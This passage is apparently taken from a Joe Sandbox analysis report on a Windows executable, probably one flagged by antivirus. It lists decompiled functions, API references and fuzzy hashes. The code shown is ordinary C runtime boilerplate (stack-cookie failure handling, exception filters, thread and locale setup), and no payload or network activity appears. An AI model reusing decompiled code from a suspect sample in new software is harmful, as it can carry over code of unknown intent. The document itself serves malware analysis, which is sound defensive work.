                                                                                                                                                                                            					asm("repe ret");
                                                                                                                                                                                            				}
                                                                                                                                                                                            				 *0x438380 = _t6;
                                                                                                                                                                                            				 *0x43837c = _t22;
                                                                                                                                                                                            				 *0x438378 = _t25;
                                                                                                                                                                                            				 *0x438374 = _t21;
                                                                                                                                                                                            				 *0x438370 = _t27;
                                                                                                                                                                                            				 *0x43836c = _t26;
                                                                                                                                                                                            				 *0x438398 = ss;
                                                                                                                                                                                            				 *0x43838c = cs;
                                                                                                                                                                                            				 *0x438368 = ds;
                                                                                                                                                                                            				 *0x438364 = es;
                                                                                                                                                                                            				 *0x438360 = fs;
                                                                                                                                                                                            				 *0x43835c = gs;
                                                                                                                                                                                            				asm("pushfd");
                                                                                                                                                                                            				_pop( *0x438390);
                                                                                                                                                                                            				 *0x438384 =  *_t31;
                                                                                                                                                                                            				 *0x438388 = _v0;
                                                                                                                                                                                            				 *0x438394 =  &_a4;
                                                                                                                                                                                            				 *0x4382d0 = 0x10001;
                                                                                                                                                                                            				_t11 =  *0x438388; // 0x0
                                                                                                                                                                                            				 *0x438284 = _t11;
                                                                                                                                                                                            				 *0x438278 = 0xc0000409;
                                                                                                                                                                                            				 *0x43827c = 1;
                                                                                                                                                                                            				_t12 =  *0x4374d0; // 0x353ea9ab
                                                                                                                                                                                            				_v812 = _t12;
                                                                                                                                                                                            				_t13 =  *0x4374d4; // 0xcac15654
                                                                                                                                                                                            				_v808 = _t13;
                                                                                                                                                                                            				 *0x4382c8 = IsDebuggerPresent();
                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                            				E0040C590(_t14);
                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                            				_t17 = UnhandledExceptionFilter(0x411d34);
                                                                                                                                                                                            				if( *0x4382c8 == 0) {
                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                            					E0040C590(_t17);
                                                                                                                                                                                            				}
                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                            			}




















                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0040E410
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040E425
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00411D34), ref: 0040E430
                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040E44C
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0040E453
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2579439406-0
                                                                                                                                                                                            • Opcode ID: 76c8bb11b8cebecf356c24081a36d3586f258a43f8f40974cbb1649574e1a985
                                                                                                                                                                                            • Instruction ID: bda269c089706b172bc3081f67be674e06a5489d715ab0107b009b998f54013c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 76c8bb11b8cebecf356c24081a36d3586f258a43f8f40974cbb1649574e1a985
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7621BEB4400308DFD740DF29F985685BBA4FB08B04F10A47EF908973A1EBB659858B0D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406F82() {
                                                                                                                                                                                            
                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00406F40);
                                                                                                                                                                                            				return 0;
                                                                                                                                                                                            			}



                                                                                                                                                                                            0x00406f87
                                                                                                                                                                                            0x00406f8f

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00006F40), ref: 00406F87
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: 2770ef3dcfecd0b1492965f7a63133527a082a5cc30f678bfd48e2f5a3335974
                                                                                                                                                                                            • Instruction ID: 294d9a006d07348d642296dff87903f653bc2266be36b3f99c490e8fcacd99f6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2770ef3dcfecd0b1492965f7a63133527a082a5cc30f678bfd48e2f5a3335974
                                                                                                                                                                                            • Instruction Fuzzy Hash: F89002602511058AC60097707C0AE456A905A4D60675285B1A502D4498DEB480505529
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d054b4bc810bef23acd84e13e871caec40518e2601be87026a964eb4790cd668
                                                                                                                                                                                            • Instruction ID: 8665d99470cc837292e785960ffe5a28c457489d2829d946bb37367926bcfc73
                                                                                                                                                                                            • Opcode Fuzzy Hash: d054b4bc810bef23acd84e13e871caec40518e2601be87026a964eb4790cd668
                                                                                                                                                                                            • Instruction Fuzzy Hash: AD02E06144E3C29FCB134BB48CB51D1BFB19E5721471E48DBC0C08F4A7E25A299ADB63
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                                            • Instruction ID: 6ec59a09f4bf7ab3ef9f3fb5cfa828d04e8f9faf371d54d466a840b16c525f68
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E0DF36650104ABC7219A0AD804CC3FBE9EBE87B07094426E94893620C234FC80C6D4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                            			E00407E7D(intOrPtr __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t35 = __ebx;
                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                            				_push(0x412638);
                                                                                                                                                                                            				E004082E4(__ebx, __edi, __esi);
                                                                                                                                                                                            				_t45 = L"KERNEL32.DLL";
                                                                                                                                                                                            				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                            					_t23 = E00406F90(_t45);
                                                                                                                                                                                            				}
                                                                                                                                                                                            				 *(_t47 - 0x1c) = _t23;
                                                                                                                                                                                            				_t46 =  *((intOrPtr*)(_t47 + 8));
                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x5c)) = 0x4111c0;
                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x14)) = 1;
                                                                                                                                                                                            				if(_t23 != 0) {
                                                                                                                                                                                            					_t35 = __imp__GetProcAddress; // 0x76684ee0
                                                                                                                                                                                            					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                                                                                                            					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
                                                                                                                                                                                            				}
                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x70)) = 1;
                                                                                                                                                                                            				 *((char*)(_t46 + 0xc8)) = 0x43;
                                                                                                                                                                                            				 *((char*)(_t46 + 0x14b)) = 0x43;
                                                                                                                                                                                            				 *(_t46 + 0x68) = 0x436d40;
                                                                                                                                                                                            				E0040A28A(_t35, 1, 0xd);
                                                                                                                                                                                            				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                                                                                                                                                            				_t14 = _t46 + 0x68; // 0x44e8968
                                                                                                                                                                                            				InterlockedIncrement( *_t14);
                                                                                                                                                                                            				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                                                            				E00407F52();
                                                                                                                                                                                            				E0040A28A(_t35, 1, 0xc);
                                                                                                                                                                                            				 *(_t47 - 4) = 1;
                                                                                                                                                                                            				_t28 =  *((intOrPtr*)(_t47 + 0xc));
                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                            					_t32 =  *0x437348; // 0x437270
                                                                                                                                                                                            					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_t20 = _t46 + 0x6c; // 0xd3b0e8b
                                                                                                                                                                                            				E00409199( *_t20);
                                                                                                                                                                                            				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                                                            				return E00408329(E00407F5B());
                                                                                                                                                                                            			}









                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412638,0000000C,00407FB8,00000000,00000000,?,004062E5,00409C9A,004088A8,?,?,004062E5,00403150,?,00403150), ref: 00407E8F
                                                                                                                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00407E9A
                                                                                                                                                                                              • Part of subcall function 00406F90: Sleep.KERNEL32(000003E8,?,?,00407DE0,KERNEL32.DLL,?,004088D2,?,004088A2,004062E5,?,?,004062E5,00403150,?,00403150), ref: 00406F9C
                                                                                                                                                                                              • Part of subcall function 00406F90: GetModuleHandleW.KERNEL32(004062E5,?,?,00407DE0,KERNEL32.DLL,?,004088D2,?,004088A2,004062E5,?,?,004062E5,00403150,?,00403150), ref: 00406FA5
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00407EC3
                                                                                                                                                                                            • GetProcAddress.KERNEL32(004062E5,DecodePointer), ref: 00407ED3
                                                                                                                                                                                            • __lock.LIBCMT ref: 00407EF5
                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(044E8968), ref: 00407F02
                                                                                                                                                                                            • __lock.LIBCMT ref: 00407F16
                                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 00407F34
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$prC$NhvIhvPdhv
                                                                                                                                                                                            • API String ID: 1028249917-2477794846
                                                                                                                                                                                            • Opcode ID: 47dc7fda2f7a2cb09fb3ee480cc7d676d4fb3dc5c517a09c794278a1ce4d92c8
                                                                                                                                                                                            • Instruction ID: 29a568a171ab08e2388afc4a227a9271e662036cda5a420f3950e154490123b6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47dc7fda2f7a2cb09fb3ee480cc7d676d4fb3dc5c517a09c794278a1ce4d92c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA116071945701AED720EF66D801B8ABBE0AF04314F10856FE999A62E0CBB8A940CF5D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                            			E00406F17() {
                                                                                                                                                                                            				signed long long _v12;
                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                            				signed long long _v28;
                                                                                                                                                                                            				signed char _t8;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                            					L6:
                                                                                                                                                                                            					_v20 =  *0x410ba0;
                                                                                                                                                                                            					_v28 =  *0x410b98;
                                                                                                                                                                                            					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                            					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                            					asm("fld1");
                                                                                                                                                                                            					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                            					asm("fnstsw ax");
                                                                                                                                                                                            					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                            						return 0;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						return 1;
                                                                                                                                                                                            					}
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                            					if(__eax == 0) {
                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                            						return __eax;
                                                                                                                                                                                            					}
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}








                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004060C3), ref: 00406F1C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00406F2C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32$NhvIhvPdhv
                                                                                                                                                                                            • API String ID: 1646373207-5371
                                                                                                                                                                                            • Opcode ID: 2141e8ee2b66fab69cba99115582389957fcbaafff06d0f330f51a4c95b03ee9
                                                                                                                                                                                            • Instruction ID: 414584f383310722c69b18f9f881d68931b6d9a34a445ea62bf295b524f4021f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2141e8ee2b66fab69cba99115582389957fcbaafff06d0f330f51a4c95b03ee9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF03030A04A0AD2DB006BE5BD1A7AF7A78BB94746F9204A1A1D6B00C4DFB490B5C24A
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                            			E004092FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t31 = __eflags;
                                                                                                                                                                                            				_t26 = __edi;
                                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                                            				_t22 = __ebx;
                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                            				_push(0x412708);
                                                                                                                                                                                            				E004082E4(__ebx, __edi, __esi);
                                                                                                                                                                                            				_t29 = E00407FDD(__ebx, _t31);
                                                                                                                                                                                            				_t13 =  *0x437264; // 0xfffffffe
                                                                                                                                                                                            				if(( *(_t29 + 0x70) & _t13) == 0) {
                                                                                                                                                                                            					L6:
                                                                                                                                                                                            					E0040A28A(_t22, _t26, 0xc);
                                                                                                                                                                                            					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                                                                                                                            					_t8 = _t29 + 0x6c; // 0x6c
                                                                                                                                                                                            					_t27 =  *0x437348; // 0x437270
                                                                                                                                                                                            					 *((intOrPtr*)(_t30 - 0x1c)) = E004092C1(_t8, _t25, _t27);
                                                                                                                                                                                            					 *(_t30 - 4) = 0xfffffffe;
                                                                                                                                                                                            					E00409369();
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                                                                                                                                                                                            					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						_t29 =  *((intOrPtr*)(E00407FDD(_t22, _t33) + 0x6c));
                                                                                                                                                                                            					}
                                                                                                                                                                                            				}
                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                            					E00406FC0(_t25, 0x20);
                                                                                                                                                                                            				}
                                                                                                                                                                                            				return E00408329(_t29);
                                                                                                                                                                                            			}










                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __getptd.LIBCMT ref: 0040930B
                                                                                                                                                                                              • Part of subcall function 00407FDD: __getptd_noexit.LIBCMT ref: 00407FE0
                                                                                                                                                                                              • Part of subcall function 00407FDD: __amsg_exit.LIBCMT ref: 00407FED
                                                                                                                                                                                            • __getptd.LIBCMT ref: 00409322
                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00409330
                                                                                                                                                                                            • __lock.LIBCMT ref: 00409340
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                            • String ID: prC
                                                                                                                                                                                            • API String ID: 3521780317-1500297756
                                                                                                                                                                                            • Opcode ID: 07a6c897102de750e18d87a46b55e8324a9b223051407a1497b7d71d25a26732
                                                                                                                                                                                            • Instruction ID: 4b365dda81fc10f29cd4daaa35ee56ed22762d8e3948514f3b24d74fb2f196eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07a6c897102de750e18d87a46b55e8324a9b223051407a1497b7d71d25a26732
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F01D31A48705DBD630BBA6850274A73A06B04728F11857FF890B72D3CB7C9D41DE5E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                            			E00408B93(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                            				LONG* _t21;
                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                            				LONG* _t33;
                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t35 = __eflags;
                                                                                                                                                                                            				_t29 = __edx;
                                                                                                                                                                                            				_t25 = __ebx;
                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                            				_push(0x4126c8);
                                                                                                                                                                                            				E004082E4(__ebx, __edi, __esi);
                                                                                                                                                                                            				_t31 = E00407FDD(__ebx, _t35);
                                                                                                                                                                                            				_t15 =  *0x437264; // 0xfffffffe
                                                                                                                                                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                            					E0040A28A(_t25, _t31, 0xd);
                                                                                                                                                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                            					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                            					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                            					__eflags = _t33 -  *0x437168; // 0x2301610
                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                            						if(_t33 != 0) {
                                                                                                                                                                                            							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                            							if(_t23 == 0) {
                                                                                                                                                                                            								__eflags = _t33 - 0x436d40;
                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                            									_push(_t33);
                                                                                                                                                                                            									E0040A989(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                            								}
                                                                                                                                                                                            							}
                                                                                                                                                                                            						}
                                                                                                                                                                                            						_t21 =  *0x437168; // 0x2301610
                                                                                                                                                                                            						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                            						_t33 =  *0x437168; // 0x2301610
                                                                                                                                                                                            						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                            						InterlockedIncrement(_t33);
                                                                                                                                                                                            					}
                                                                                                                                                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                            					E00408C2E();
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                            				}
                                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                                            					E00406FC0(_t29, 0x20);
                                                                                                                                                                                            				}
                                                                                                                                                                                            				return E00408329(_t33);
                                                                                                                                                                                            			}












                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __getptd.LIBCMT ref: 00408B9F
                                                                                                                                                                                              • Part of subcall function 00407FDD: __getptd_noexit.LIBCMT ref: 00407FE0
                                                                                                                                                                                              • Part of subcall function 00407FDD: __amsg_exit.LIBCMT ref: 00407FED
                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00408BBF
                                                                                                                                                                                            • __lock.LIBCMT ref: 00408BCF
                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00408BEC
                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(02301610), ref: 00408C17
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                                                                            • Opcode ID: 6d90e189aaf73bd74ff76e928004a0f36092a6cdf6b5a25c5694984172ad263c
                                                                                                                                                                                            • Instruction ID: 3c96cca1601acfa5e44c84fa2913d418f045535533671cac7f11ee448469f361
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d90e189aaf73bd74ff76e928004a0f36092a6cdf6b5a25c5694984172ad263c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B017C72905B119BEB21AB269A0575A7770AB04724F05403FF890773D0CF7C6981CEAE
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 43%
